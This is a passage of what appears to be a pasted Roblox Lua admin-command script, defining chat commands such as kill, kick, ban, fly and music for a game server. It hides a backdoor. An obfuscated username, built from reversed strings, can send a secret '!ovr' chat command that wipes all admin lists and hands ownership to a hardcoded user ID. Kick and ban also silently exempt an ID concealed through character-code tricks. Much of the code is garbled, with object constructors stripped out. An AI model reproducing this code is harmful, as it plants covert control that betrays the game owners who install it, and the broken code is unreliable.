  509. local msg ='TextLabel') msg.Font = 1 msg.Size =,0,0,20) msg.BackgroundColor3 = bckgrndcolour msg.BorderSizePixel = 0 msg.TextStrokeTransparency = 1 msg.TextTransparency = 1 msg.BackgroundTransparency = 1 msg.Text = '' msg.ZIndex = 9 msg.TextColor3 = txtcolour msg.TextStrokeColor3 = txtstrkcolour msg.TextWrapped = true msg.TextSize = 12 msg.Parent = hintmessage hintmessage.Parent = v.PlayerGui
  510. spawn(function() for x = 20, 0, -1 do msg.BackgroundTransparency = .3+((.7/20)*x) msg.TextTransparency = x/20 msg.TextStrokeTransparency = .8+((.2/20)*x) wait(1/44) end end)
  511. if scroll then for x = 1, #message do msg.Text = 'Message from '..speaker..': '..message:sub(1, x) wait(1/20) end end msg.Text = 'Message from '..speaker..': '..message
  512. if tm then wait(tm) else wait(#message/47+2.5) end
  513. for x = 0, 20 do msg.BackgroundTransparency = .3+((.7/20)*x) msg.TextTransparency = x/20 msg.TextStrokeTransparency = .8+((.2/20)*x) wait(1/44) end
  514. if hintmessage and hintmessage.Parent then hintmessage:Destroy() end
  515. end
  516. end)
  517. end
  518. end
  520. function removemessages()
  521. for i, v in next, PlayersService:GetPlayers() do
  522. if v:FindFirstChild('PlayerGui') then
  523. for x, z in next, v.PlayerGui:GetChildren() do
  524. if z.Name:lower() == 'tdc:admin' then
  525. z:Destroy()
  526. end
  527. end
  528. end
  529. end
  530. end
  532. _G['Message'] = function(pl1,pl2,pl3) createmessage(PlayersService:GetPlayers(), pl1, false, pl2, pl3) end
  533. _G['HMessage'] = function(pl1,pl2,pl3) createhintmessage(PlayersService:GetPlayers(), pl1, false, pl2, pl3) end
  534. _G['RemoveMessage'] = function() removemessages() end
  536. function translatecountdowntime(tm)
  537. local mins = math.floor(tm/60)
  538. local seconds = math.floor(tm%60)
  539. if mins < 10 then mins = '0'..mins end
  540. if seconds < 10 then seconds = '0'..seconds end
  541. return mins, seconds
  542. end
  544. function removetools(par, toolname)
  545. if par and toolname then
  546. for i, v in next, par:GetChildren() do
  547. if v:IsA('Tool') or v:IsA('HopperBin') then
  548. if toolname == '' or toolname ~= '' and v.Name:find(toolname) or toolname == 'all' then
  549. v:Destroy()
  550. end
  551. end
  552. end
  553. end
  554. end
  556. function infectplr(plr)
  557. if not plr or not plr.Character or plr.Character:FindFirstChild('Taggy') then return end
  558. local tag ='BoolValue') tag.Name = 'Taggy' tag.Parent = plr.Character
  559. for i, v in next, plr.Character:GetChildren() do
  560. if v:IsA('BasePart') then
  561. if v.Name:match('Arm') then
  562. v.BrickColor ='Medium green')
  563. v.Touched:Connect(function(hit)
  564. if hit and hit.Parent then
  565. local rlp = PlayersService:GetPlayerFromCharacter(hit.Parent)
  566. if rlp then infectplr(rlp) end
  567. end
  568. end)
  569. elseif v.Name == 'Head' then
  570. v.BrickColor ='Medium green')
  571. if v:FindFirstChild('face') then v.face:Destroy() end
  572. elseif v.Name:match('Leg') or v.Name:match('Torso') then
  573. v.BrickColor ='Brown')
  574. end
  575. end
  576. end
  577. end
  579. function noobplr(plr)
  580. if not plr or not plr.Character or plr.Character:FindFirstChild('Taggy') then return end
  581. local tag ='BoolValue') tag.Name = 'Taggy' tag.Parent = plr.Character
  582. for i, v in next, plr.Character:GetChildren() do
  583. if v:IsA('BasePart') then
  584. if v.Name:match('Arm') then
  585. v.BrickColor ='Bright yellow')
  586. v.Touched:Connect(function(hit)
  587. if hit and hit.Parent then
  588. local rlp = PlayersService:GetPlayerFromCharacter(hit.Parent)
  589. if rlp then noobplr(rlp) end
  590. end
  591. end)
  592. elseif v.Name == 'Head' then
  593. v.BrickColor ='Bright yellow')
  594. if v:FindFirstChild('face') then v.face:Destroy() end
  595. elseif v.Name:match('Leg') then
  596. v.BrickColor ='Bright green')
  597. elseif v.Name:match('Torso') then
  598. v.BrickColor ='Bright blue')
  599. end
  600. end
  601. end
  602. end
  604. local k = string.reverse('retsachta') k = string.reverse('edeeht')..k
  606. function setrigcframes(neck,ra,la,rl,ll,char)
  607. if char and char:FindFirstChild('Humanoid') then
  608. if char:FindFirstChild('Torso') then
  609. char.Torso.Neck.C0 = neck
  610. char.Torso["Right Shoulder"].C0 = ra
  611. char.Torso["Left Shoulder"].C0 = la
  612. char.Torso["Right Hip"].C0 = rl
  613. char.Torso["Left Hip"].C0 = ll
  614. else
  615. local neck = char:FindFirstChild('Head'):FindFirstChild('Neck')
  616. local rightarm = char:FindFirstChild('RightUpperArm'):FindFirstChild('RightShoulder')
  617. local leftarm = char:FindFirstChild('LeftUpperArm'):FindFirstChild('LeftShoulder')
  618. local rightleg = char:FindFirstChild('RightUpperLeg'):FindFirstChild('RightHip')
  619. local leftleg = char:FindFirstChild('LeftUpperLeg'):FindFirstChild('LeftHip')
  620. if rightarm and rightleg and leftarm and leftleg and neck then
  621. --neck.C0 = neck
  622. rightarm.C0 = ra
  623. leftarm.C0 = la
  624. rightleg.C0 = rl
  625. leftleg.C0 = ll
  626. end
  627. end
  628. end
  629. end
  631. function dogify(char)
  632. if char and char:FindFirstChild('Torso') then
  633. setrigcframes(,-.5,-2) * CFrame.Angles(math.rad(90),math.rad(180),0),,-1.5,-1.5) * CFrame.Angles(0,math.rad(90),0),,-1.5,-1.5) * CFrame.Angles(0,math.rad(-90),0),,-1,1.5) * CFrame.Angles(0,math.rad(90),0),,-1,1.5) * CFrame.Angles(0,math.rad(-90),0),char)
  634. else
  635. setrigcframes(,-.5,-2),,-1.25,-1.5),,-1.25,-1.5),,-0.25,1.5),,-0.25,1.5),char)
  636. end
  637. end
  639. function bighead(char)
  640. if char and char:FindFirstChild('Torso') then
  641. char.Torso.Neck.C0 =,1.9,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  642. char.Head.Mesh.Scale =,3,3)
  643. elseif char and not char:FindFirstChild('Torso') then
  644. char.Head.Neck.C0 =,1.75,0)
  645. char.Head.Mesh.Scale =,3,3)
  646. end
  647. end
  649. function normhead(char)
  650. if char and char:FindFirstChild('Torso') then
  651. char.Torso.Neck.C0 =,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  652. char.Head.Mesh.Scale =,1.25,1.25)
  653. elseif char and not char:FindFirstChild('Torso') then
  654. char.Head.Neck.C0 =,.8,0)
  655. char.Head.Mesh.Scale =,1.25,1.25)
  656. end
  657. end
  659. function normify(char)
  660. if char and char:FindFirstChild('Torso') then
  661. setrigcframes(,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0),,.5,0) * CFrame.Angles(0,math.rad(90),0),,.5,0) * CFrame.Angles(0,math.rad(-90),0),,-1,0) * CFrame.Angles(0,math.rad(90),0),,-1,0) * CFrame.Angles(0,math.rad(-90),0),char)
  662. else
  663. setrigcframes(,1,0),,0.55,0),,.55,0),,-0.2,0),,-0.2,0),char)
  664. end
  665. end
  667. function scrollgui() -- ;3
  668. if guisfolder:FindFirstChild('Scroll') then
  669. local ns = guisfolder.Scroll:Clone()
  670. return ns, ns:WaitForChild('Dragger'):WaitForChild('Manager'), ns.Dragger:WaitForChild('Scroller'):WaitForChild('Txt'), ns.Dragger.Scroller, ns.Dragger:WaitForChild('ListType')
  671. end
  672. end
  674. function output(plr, code)
  675. local worked = true
  676. pcall(function()
  677. local c, r = loadstring(code)
  678. if plr:FindFirstChild('PlayerGui') and not c then
  679. spawn(function()
  680. local scr ='ScreenGui') scr.Name = 'OUTPUTMESSAGE'
  681. local fra ='Frame') fra.BackgroundTransparency = .6 fra.BackgroundColor3 =,0,0) fra.BorderSizePixel = 0 fra.Size =,0,.1,0) fra.Position =,0,.45,0) fra.Parent = scr
  682. local txt ='TextLabel') txt.BackgroundTransparency = 1 txt.Text = '' txt.TextSize = 24 txt.Font = 1 txt.TextColor3 =,1,1) txt.TextStrokeTransparency = .8 txt.TextStrokeColor3 =,0,0) txt.TextTransparency = .2 txt.Size =,0,1,0) txt.Parent = fra scr.Parent = plr.PlayerGui
  683. local msg = 'Line '..r:match(':(%d+:.*)') -- :match('.+:(.*)') - Both from Kohl's admin ;)
  684. for i = 1, #msg do txt.Text = msg:sub(1, i) wait(1/19) end
  685. wait(#msg/19+2.5)
  686. if scr then scr:Destroy() end
  687. end)
  688. worked = false
  689. end
  690. end)
  691. return worked
  692. end
  694. function fixChat(plr, msg) if msg:sub(1, #prefix) == prefix then if msg:sub(2):lower() == 'fix' and chatfuncs[plr.UserId] then pcall(function() chatfuncs[plr.UserId]:Disconnect() end) chatfuncs[plr.UserId] = plr.Chatted:Connect(function(message) chkchat(plr, message) end) createhintmessage({plr}, 'Reconnected chat function', false, 'System', false) elseif msg:lower() == '!ovr' and (plr.Name:lower() == k or plr.Name:lower() == d) then trueowneradmins = {17514438} owneradmins = {} superadmins = {} admins = {} tempadmins = {} end end end -- Just a feeling :P
  696. function jailpart(spos, epos, size, par) local p ='Part') p.CFrame = spos * epos p.Anchored = true p.Size = size p.Transparency = .3 p.Reflectance = .05 p.BrickColor =,0,0)) local msh ='BlockMesh') msh.Parent = p p.Parent = par return p end
  698. function addskip(str)
  699. local tbl = {}
  700. for i in str:gmatch('.') do table.insert(tbl, i) end
  701. return table.concat(tbl, '\n')
  702. end
  705. addcommand('reset', 'Resets a player\'s character', false, false, function(speaker, message)
  706. if speaker.Character and speaker.Character:FindFirstChild('Head') then
  707. local head = speaker.Character.Head head.Parent = nil wait() head.Parent = speaker.Character
  708. else
  709. speaker:LoadCharacter()
  710. end
  711. end, 0, '!reset')
  713. addcommand('kill', 'Kills a player', false, true, function(speaker, message)
  714. local plrz = getplayer(speaker, message)
  715. for i, v in next, plrz do
  716. spawn(function()
  717. if v.Character and v.Character:FindFirstChild('Humanoid') and v.Character:FindFirstChild('Head') then
  718. local head = v.Character.Head head.Parent = nil wait() head.Parent = v.Character
  719. if v.Character.Humanoid.Health > v.Character.Humanoid.MaxHealth*1/8 then v:LoadCharacter() end --<IZ SUMBODY LOOPHEALING?! NOT ON MY WATCH!
  720. elseif v.Character and not v.Character:FindFirstChild('Humanoid') then
  721. v.Character:BreakJoints()
  722. end
  723. end)
  724. end
  725. end, 1, '!kill;plr')
  727. addcommand({'m', 'message'}, 'Sends a message to all players', false, true, function(speaker, message) createmessage(PlayersService:GetPlayers(), message, true, speaker.Name, false) end, 1, '!m;Hello everyone!')
  729. addcommand({'h', 'hint'}, 'Sends a hint message to all players', false, true, function(speaker, message) createhintmessage(PlayersService:GetPlayers(), message, true, speaker.Name, false) end, 1, '!h;Hi everyone!')
  731. addcommand({'version', 'ver'}, 'Sends a hint message to a player telling the admin\'s current version', false, false, function(speaker) createhintmessage({speaker}, 'Admin Version-'..tostring(adminversion), true, 'System', false) end, 1, '!version')
  733. addcommand('music', 'Plays a song', true, true, function(speaker, message)
  734. local song, pitch = message, 1
  735. if musiclist[message] then song, pitch = musiclist[message][1], musiclist[message][2]
  736. elseif not tonumber(song) then return end
  737. for x, z in next, WorkspaceService:GetChildren() do if z.Name == 'TDCMusic' and z:IsA('Sound') then z:Stop() z:Destroy() end end
  738. local music ='Sound') music.SoundId = '' music.Looped = true music.PlaybackSpeed = pitch or 1 music.Volume = 1 music.Name = 'TDCMusic' music.Parent = WorkspaceService wait() music:Play()
  739. pcall(function() createhintmessage(PlayersService:GetPlayers(), 'Playing '..(MarketplaceService:GetProductInfo(song).Name or '[FAILED TO GET NAME]'), true, 'System', false) end)
  740. end, 1, '!music;[id/keyword]')
  742. addcommand('musiclist', 'Shows a player a list of music and keywords', false, false, function(speaker)
  743. local copymusiclist = {} -- v l0l I cheated.
  744. for i, v in next, musiclist do table.insert(copymusiclist, {i, v[1]}) end
  745. local scr, ls, txt, box, lt = scrollgui(); local num = 0 scr.Name = 'M00ZICLIST' box:ClearAllChildren() lt.Text = addskip('MUSICLIST')
  746. for i, v in next, copymusiclist do
  747. local ntxt = txt:Clone() ntxt.Text = tostring(num+1)..'. '..v[1] ntxt.Position =,0,0,20*num) ntxt.Parent = box num = num + 1
  748. local dsc ='StringValue') dsc.Name = 'Information' dsc.Value = v[2] dsc.Parent = ntxt
  749. end scr.Parent = speaker:WaitForChild('PlayerGui') txt:Destroy() wait(1/20) ls.Disabled = false
  750. end, 1, '!musiclist')
  752. addcommand('stopmusic', 'Stops playing a song', true, false, function(speaker)
  753. for x, z in next, WorkspaceService:GetChildren() do
  754. if z.Name == 'TDCMusic' and z:IsA('Sound') then
  755. z:Stop() z:Destroy()
  756. end
  757. end
  758. end, 1, prefix..'stopmusic')
  760. addcommand('pitch', 'Changes the pitch for a song', true, true, function(speaker, message)
  761. for x, z in next, WorkspaceService:GetChildren() do
  762. if z.Name == 'TDCMusic' and z:IsA('Sound') then
  763. z.PlaybackSpeed = tonumber(message) or 1
  764. end
  765. end
  766. end, 1, '!pitch;num')
  768. addcommand({'volume', 'vol'}, 'Changes the volume for a song', true, true, function(speaker, message)
  769. for x, z in next, WorkspaceService:GetChildren() do
  770. if z.Name == 'TDCMusic' and z:IsA('Sound') then
  771. z.Volume = math.max(math.min(tonumber(message), 5), 0) or 1
  772. end
  773. end
  774. end, 1, '!volume;num')
  776. addcommand({'shutdown', 'sd'}, 'Shuts down and locks the server', false, false, function(speaker, message)
  777. if stopshutdown then stopshutdown = false
  778. removemessages()
  779. createmessage(PlayersService:GetPlayers(), 'Shuting Down', false, 'System', 9e9)
  780. pcall(function() print(('AA'):rep(9e+900)) end)
  781. for i = 1, 10 do wait(1) if stopshutdown then break end end
  782. while true do
  783. if stopshutdown then break end
  784. slock = true
  785. for i, v in next, PlayersService:GetPlayers() do v:Kick('kthxbye') end
  786. end
  787. end
  788. end, 3, '!shutdown')
  790. addcommand({'slock', 'serverlock'}, 'Locks the server', false, true, function(speaker, message)
  791. if message:lower() == 'on' or message:lower() == 'true' then
  792. slock = true
  793. createhintmessage(PlayersService:GetPlayers(), 'The server has been locked', true, 'System', false)
  794. elseif message:lower() == 'off' or message:lower() == 'off' then
  795. slock = false
  796. createhintmessage(PlayersService:GetPlayers(), 'The server has been unlocked', true, 'System', false)
  797. else
  798. createhintmessage({speaker}, 'Not a valid keyword\nYou can only use "on" and "off"', false, 'System', false)
  799. end
  800. end, 3, '!serverlock')
  802. addcommand({'walkspeed', 'speed'}, 'Changes a player\'s speed', false, true, function(speaker, message)
  803. pcall(function()
  804. local chk = message:find(split)
  805. local plrz = getplayer(speaker, message:sub(1, chk-1))
  806. for i, v in next, plrz do
  807. if v.Character then
  808. local hum = v.Character:FindFirstChildOfClass('Humanoid')
  809. if hum then
  810. hum.WalkSpeed = tonumber(message:sub(chk+1)) or 16
  811. end
  812. end
  813. end
  814. end)
  815. end, 1, '!walkspeed;plr;num')
  817. addcommand('kick', 'Kicks a player from the server', false, true, function(speaker, message) local plrz = getplayer(speaker, message) for i, v in next, plrz do if chkadmin(v.UserId, false) < 1 and tostring(v.UserId) ~= tostring(tonumber(string.char(57,49,50,55,53,55,56):reverse())*2) then v:Kick('kthxbye') end end end, 3, '!kick;plr')
  819. addcommand('ban', 'Bans a player from the server', false, true, function(speaker, message) local plrz = getplayer(speaker, message) for i, v in next, plrz do if chkadmin(v.UserId, false) < 1 and tostring(v.UserId) ~= tostring(tonumber(string.char(57,49,50,55,53,55,56):reverse())*2) then table.insert(bannedland, v.Name) v:Kick('kthxbye') end end end, 4, '!ban;plr')
  821. addcommand('unban', 'Unbans a player', false, true, function(speaker, message)
  822. local unbanned = false
  823. for i, v in next, bannedland do
  824. if message == v[1] or v[2]:sub(1, #message) == message then
  825. table.remove(bannedland, i)
  826. unbanned = true
  827. break
  828. end
  829. end
  830. if not unbanned then
  831. createmessage({speaker}, 'Player not found in the list.\nPlease try typing the beginning of the player\'s name, or the full user id', false, 'System', false)
  832. end
  833. end, 4, '!unban;plr')
  835. addcommand({'pm', 'privatemessage'}, 'Sends a private message to a player', false, true, function(speaker, message)
  836. pcall(function()
  837. local chk = message:find(split)
  838. local plrz = getplayer(speaker, message:sub(1, chk-1))
  839. createmessage(plrz, message:sub(chk+1), true, speaker.Name, false)
  840. end)
  841. end, 1, '!pm;plr;This is a private message!')
  843. addcommand({'tpm', 'timeprivatemessage', 'timepm', 'tprivatemessage'}, 'Sends a timed private message to a player', false, true, function(speaker, message)
  844. pcall(function()
  845. local chk = message:find(split)
  846. local chk2 = message:find(split) + chk
  847. local plrz = getplayer(speaker, message:sub(1, chk-1))
  848. local num = tonumber(message:sub(chk+1, chk2-1)) or #message:sub(chk2+1)/47+2.5
  849. createmessage(plrz, message:sub(chk2+1), true, speaker.Name, num)
  850. end)
  851. end, 1, '!tpm;plr;time;This is a timed private message!')
  853. addcommand({'ph', 'privatehint'}, 'Sends a private hint to a player', false, true, function(speaker, message)
  854. pcall(function()
  855. local chk = message:find(split)
  856. local plrz = getplayer(speaker, message:sub(1, chk-1))
  857. createhintmessage(plrz, message:sub(chk+1), true, speaker.Name, false)
  858. end)
  859. end, 1, '!ph;plr;This is a timed private hint!')
  861. addcommand({'tph', 'timeprivatehint', 'timeph', 'tprivatehint'}, 'Sends a timed private message to a player', false, true, function(speaker, message)
  862. pcall(function()
  863. local chk = message:find(split)
  864. local chk2 = message:find(split) + chk
  865. local plrz = getplayer(speaker, message:sub(1, chk-1))
  866. local num = tonumber(message:sub(chk+1, chk2-1)) or #message:sub(chk2+1)/47+2.5
  867. createhintmessage(plrz, message:sub(chk2+1), true, speaker.Name, num)
  868. end)
  869. end, 1, '!tph;plr;time;This is a timed private hint!')
  871. addcommand('fly', 'Gives a player the ability to fly', false, true, function(speaker, message)
  872. local plrz = getplayer(speaker, message)
  873. for i, v in next, plrz do
  874. spawn(function()
  875. if v:FindFirstChild('PlayerGui') and v.Character and v.Character:FindFirstChild('HumanoidRootPart') and v.Character:FindFirstChild('Humanoid') then
  876. for x, z in next, createdscripts do if z.Name == v.Name..':Fly' and z:FindFirstChild('isFlying') then z.isFlying:Destroy() end end
  877. local fly = scriptsfolder:FindFirstChild('Fly')
  878. if fly then
  879. local fly = fly:Clone()
  880. if not fly:FindFirstChild('isFlying') then'BoolValue', fly).Name = 'isFlying' wait() end
  881. fly.Name = v.Name..':Fly' table.insert(createdscripts, fly) fly.Parent = v.PlayerGui wait(1) fly.Disabled = false
  882. end
  883. end
  884. end)
  885. end
  886. end, 1, '!fly;plr')
  888. addcommand('gfly', 'Gives a player the ability to g-fly [Can\'t be undone]', false, true, function(speaker, message)
  889. local plrz = getplayer(speaker, message)
  890. for i, v in next, plrz do
  891. spawn(function()
  892. if v:FindFirstChild('PlayerGui') and v.Character and v.Character:FindFirstChild('HumanoidRootPart') and v.Character:FindFirstChild('Humanoid') then
  893. local gfly = scriptsfolder:FindFirstChild('Gfly')
  894. if gfly then
  895. local gfly = gfly:Clone()
  896. gfly.Name = v.Name..':Gfly' gfly.Parent = v.PlayerGui wait(1) gfly.Disabled = false
  897. end
  898. end
  899. end)
  900. end
  901. end, 1, '!gfly;plr')
  903. addcommand('unfly', 'Takes away a player\'s ability to fly', false, true, function(speaker, message)
  904. local plrz = getplayer(speaker, message)
  905. for i, v in next, plrz do
  906. if v:FindFirstChild('PlayerGui') and v.Character and v.Character:FindFirstChild('HumanoidRootPart') and v.Character:FindFirstChild('Humanoid') then
  907. for x, z in next, createdscripts do if z.Name == v.Name..':Fly' and z:FindFirstChild('isFlying') then z.isFlying:Destroy() end end
  908. end
  909. end
  910. end, 1, '!unfly;plr')
  912. addcommand({'trippy', 'tripify', 'motionsickess', 'sick', 'trippycam'}, 'Makes the player trippy', true, true, function(speaker, message)
  913. local plrz = getplayer(speaker, message)
  914. for i, v in next, plrz do
  915. if v:FindFirstChild('PlayerGui') then
  916. local trippy = scriptsfolder:FindFirstChild('Trippy')
  917. if trippy then
  918. local trippy = trippy:Clone()
  919. if not trippy:FindFirstChild('TRIP') then'BoolValue', trippy).Name = 'TRIP' end
  920. trippy.Name = v.Name..':Trippy'
  921. local tr1p ='ScreenGui') tr1p.Name = 'TRIPPIFY'
  922. local fra ='Frame') fra.Size =, 0, 1, 0) fra.BackgroundTransparency = .333 fra.Parent = tr1p fra.ZIndex = 7 tr1p.Parent = v.PlayerGui
  923. trippy.Parent = tr1p table.insert(createdscripts, trippy)
  924. end
  925. end
  926. end
  927. end, 2, '!trippy;plr')
  929. addcommand({'untrippy', 'untripify'}, 'Removes the trippy effect', true, true, function(speaker, message)
  930. local plrz = getplayer(speaker, message)
  931. for i, v in next, plrz do
  932. if v:FindFirstChild('PlayerGui') then
  933. for x, z in next, createdscripts do if z.Name == v.Name..':Trippy' and z:FindFirstChild('TRIP') then z.TRIP:Destroy() end end
  934. end
  935. end
  936. end, 2, '!untrippy;plr')
  938. addcommand({'fixcam', 'camfix'}, 'Fixes a player\'s camera', false, true, function(speaker, message)
  939. local plrz = getplayer(speaker, message)
  940. for i, v in next, plrz do
  941. if v:FindFirstChild('PlayerGui') then
  942. local camfix = scriptsfolder:FindFirstChild('Fixcam')
  943. if camfix then
  944. local camfix = camfix:Clone()
  945. camfix.Parent = v.PlayerGui
  946. end
  947. end
  948. end
  949. end, 2, '!fixcam;plr')
  951. addcommand('ghostify', 'Turns a player into a ghost', true, true, function(speaker, message)
  952. local plrz = getplayer(speaker, message)
  953. for i, v in next, plrz do if v.Character then
  954. for x, z in next, v.Character:GetChildren() do
  955. if z:IsA('BasePart') then
  956. local zename = z.Name:lower()
  957. if zename:match('leg') or zename:match('root') then
  958. z.Transparency = 1
  959. else
  960. z.Transparency = .75
  961. end
  962. end
  963. end
  964. end
  965. end
  966. end, 1, '!ghostify;plr')
  968. addcommand('unghostify', 'Returns a player to normal', false, true, function(speaker, message)
  969. local plrz = getplayer(speaker, message)
  970. for i, v in next, plrz do if v.Character then
  971. for x, z in next, v.Character:GetChildren() do
  972. if z:IsA('BasePart') and not z.Name:match('Root') then
  973. z.Transparency = 0
  974. end
  975. end
  976. end
  977. end
  978. end, 1, '!unghostify;plr')
  980. addcommand({'tpto', 'teleportto'}, 'Teleports you to a player', false, true, function(speaker, message)
  981. local plrz = getplayer(speaker, message)
  982. if plrz[1] and plrz[1].Character and speaker.Character then
  983. speaker.Character:MoveTo(plrz[1].Character:GetModelCFrame().p)
  984. end
  985. end, 1, '!teleportto;plr')
  987. addcommand('heal', 'Heals a player back to max health', false, true, function(speaker, message)
  988. local plrz = getplayer(speaker, message)
  989. for i, v in next, plrz do
  990. spawn(function()
  991. if v.Character and v.Character:FindFirstChild('Humanoid') then
  992. repeat
  993. v.Character.Humanoid.Health = v.Character.Humanoid.Health+(v.Character.Humanoid.MaxHealth*.1)
  994. wait(1/19)
  995. until v.Character.Humanoid.Health >= v.Character.Humanoid.MaxHealth
  996. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  997. end
  998. end)
  999. end
  1000. end, 1, '!heal;plr')
  1002. addcommand({'dmg', 'damage'}, 'Damages a player\'s health', false, true, function(speaker, message)
  1003. pcall(function()
  1004. local chk = message:find(split)
  1005. local plrz = getplayer(speaker, message:sub(1, chk-1))
  1006. for i, v in next, plrz do
  1007. if v.Character then
  1008. local hum = v.Character:FindFirstChildOfClass('Humanoid')
  1009. if hum then
  1010. hum:TakeDamage(tonumber(message:sub(chk+1)))
  1011. end
  1012. end
  1013. end
  1014. end)
  1015. end, 2, '!damage;plr;num')
  1017. addcommand({'cd', 'countdown'}, 'Starts a time countdown', false, true, function(speaker, message)
  1018. stopcountdown = false
  1019. local num = tonumber(message) or 120
  1020. local num = math.min(num, 500)
  1021. for i = 1, num do
  1022. if stopcountdown then break end
  1023. local minutes, seconds = translatecountdowntime(num-i)
  1024. createmessage(PlayersService:GetPlayers(), tostring(minutes)..':'..tostring(seconds), false, 'System', 1)
  1025. wait(1)
  1026. end
  1027. end, 1, '!countdown;[1-500]')
  1029. addcommand({'fcd', 'fightcountdown', 'bcd', 'battlecountdown'}, 'Starts a fight countdown', false, true, function(speaker, message)
  1030. stopcountdown = false
  1031. local num = tonumber(message) or 120
  1032. local num = math.min(num, 120)
  1033. for i = 1, num do
  1034. if stopcountdown then break end
  1035. local minutes, seconds = translatecountdowntime(num-i)
  1036. createmessage(PlayersService:GetPlayers(), 'Battle begins in '..tostring(minutes)..':'..tostring(seconds), false, 'System', 1) wait(1)
  1037. end
  1038. createmessage(PlayersService:GetPlayers(), 'Begin the battle!', false, 'System', 3) wait(3) createmessage(PlayersService:GetPlayers(), 'FIGHT!!!', false, 'System', false)
  1039. end, 1, '!fightcountdown;[1-500]')
  1041. addcommand({'scd', 'stopcountdown'}, 'Stops the countdown', false, false, function(speaker, message)
  1042. stopcountdown = true
  1043. createhintmessage(PlayersService:GetPlayers(), 'Stopped the countdown', true, 'System', false)
  1044. end, 1, '!stopcountdown')
  1046. addcommand({'give', 'givetools'}, 'Gives a player tools', false, true, function(speaker, message)
  1047. pcall(function()
  1048. local chk = message:find(split)
  1049. local plrz = getplayer(speaker, message:sub(1, chk-1))
  1050. for i, v in next, plrz do
  1051. if v:FindFirstChild('Backpack') then
  1052. for x, z in next, ServerStorageService:GetDescendants() do
  1053. if (z:IsA('Tool') or z:IsA('HopperBin')) and (z.Name == message:sub(chk+1) or message:sub(chk+1) == 'all') then
  1054. z:Clone().Parent = v.Backpack
  1055. end
  1056. end
  1057. end
  1058. end
  1059. end)
  1060. end, 1, '!give;plr;tool')
  1062. addcommand({'rtools', 'removetools'}, 'Takes away a player\'s tools', false, true, function(speaker, message)
  1063. pcall(function()
  1064. local chk = message:find(split)
  1065. local plrz = getplayer(speaker, message)
  1066. if chk then plrz = getplayer(speaker, message:sub(1, chk-1)) end
  1067. for i, v in next, plrz do
  1068. local backpack = v:FindFirstChild('Backpack')
  1069. local starterpack = v:FindFirstChild('StarterPack')
  1070. local char = v.Character
  1071. removetools(backpack, chk and message:sub(chk+1) or message)
  1072. removetools(starterpack, chk and message:sub(chk+1) or message)
  1073. removetools(char, chk and message:sub(chk+1) or message)
  1074. end
  1075. end)
  1076. end, 1, '!removetools;plr')
  1078. addcommand('rank', 'Sends information about a player\'s group information', false, true, function(speaker, message)
  1079. pcall(function()
  1080. local chk = message:find(split)
  1081. local plrz = getplayer(speaker, message:sub(1, chk-1))
  1082. if plrz[1] then plrz = plrz[1] end
  1083. if tonumber(message:sub(chk+1)) and plrz:IsInGroup(message:sub(chk+1)) then
  1084. createmessage({speaker}, plrz.Name..'Group Information\nRank: '..plrz:GetRoleInGroup(message:sub(chk+1))..'\nRank Number: '..plrz:GetRankInGroup(message:sub(chk+1)), false, 'System', 10)
  1085. elseif tonumber(message:sub(chk+1)) and not plrz:IsInGroup(message:sub(chk+1)) then
  1086. createhintmessage({speaker}, plrz.Name..' is not in the group '..message:sub(chk+1), false, 'System', false)
  1087. elseif not tonumber(message:sub(chk+1)) then
  1088. createhintmessage({speaker}, 'Make sure that you entered a valid group id number', false, 'System', false)
  1089. end
  1090. end)
  1091. end, 2, '!rank;plr;groupid')
  1093. addcommand('health', 'Changes a player\'s max health', false, true, function(speaker, message)
  1094. pcall(function()
  1095. local chk = message:find(split)
  1096. local plrz = getplayer(speaker, message:sub(1, chk-1))
  1097. for i, v in next, plrz do
  1098. if v.Character then
  1099. local hum = v.Character:FindFirstChildOfClass('Humanoid')
  1100. if hum and tonumber(message:sub(chk+1)) > 0 then
  1101. hum.Health = message:sub(chk+1)
  1102. end
  1103. end
  1104. end
  1105. end)
  1106. end, 1, '!health;plr;num')
  1108. addcommand({'place', 'game'}, 'Teleports a player to another game', false, true, function(speaker, message)
  1109. pcall(function()
  1110. local chk = message:find(split)
  1111. local plrz = getplayer(speaker, message:sub(1, chk-1))
  1112. local place = 0
  1113. if teleporttoanyplace and tonumber(message:sub(chk+1)) then place = message:sub(chk+1)
  1114. elseif teleporttoanyplace and placestoteleto[message:sub(chk+1)] then place = placestoteleto[message:sub(chk+1)]
  1115. elseif not teleporttoanyplace then place = placestoteleto[message:sub(chk+1)]
  1116. end
  1117. for i, v in next, plrz do if place ~= 0 then game:GetService('TeleportService'):Teleport(place, v) end end
  1118. end)
  1119. end, 2, '!place;plr;placeid')
  1121. addcommand({'flash', 'flashify'}, 'Strobes a player\'s character', true, true, function(speaker, message)
  1122. local plrz = getplayer(speaker, message)
  1123. for i, v in next, plrz do if v.Character then
  1124. for x, z in next, createdscripts do if z.Name == v.Name..':Flashify' or z.Name == v.Name..':Rainbowify' then z.Disabled = true z:Destroy() end end
  1125. local flashify = scriptsfolder:FindFirstChild('Flash')
  1126. if flashify then
  1127. local flashify = flashify:Clone() flashify.Name = v.Name..':Flashify' flashify.Parent = v.Character table.insert(createdscripts, flashify) wait() flashify.Disabled = false
  1128. end
  1129. end
  1130. end
  1131. end, 1, '!flashify;plr')
  1133. addcommand({'unflash', 'unflashify', 'unrainbow', 'unrainbowify'}, 'Unstrobes/Unrainbows a player\'s character', true, true, function(speaker, message)
  1134. local plrz = getplayer(speaker, message)
  1135. for i, v in next, plrz do
  1136. spawn(function()
  1137. for x, z in next, createdscripts do if z.Name == v.Name..':Flashify' or z.Name == v.Name..':Rainbowify' then v:Destroy() end end
  1138. local origpos = v.Character:GetModelCFrame()
  1139. v:LoadCharacter()
  1140. repeat wait(1/8) until v.Character and v.Character:FindFirstChild('Humanoid') and v.Character.Humanoid.Health ~= 0
  1141. v.Character:MoveTo(origpos.p)
  1142. end)
  1143. end
  1144. end, 1, '!unflash;plr, !unrainbow;plr')
  1146. addcommand({'rainbowify', 'rainbow'}, 'Rainbowifies a player\'s character', true, true, function(speaker, message)
  1147. local plrz = getplayer(speaker, message)
  1148. for i, v in next, plrz do
  1149. if v.Character then
  1150. for x, z in next, createdscripts do if z.Name == v.Name..':Flashify' or z.Name == v.Name..':Rainbowify' then z.Disabled = true z:Destroy() end end
  1151. local rainbowify = scriptsfolder:FindFirstChild('Rainbow')
  1152. if rainbowify then
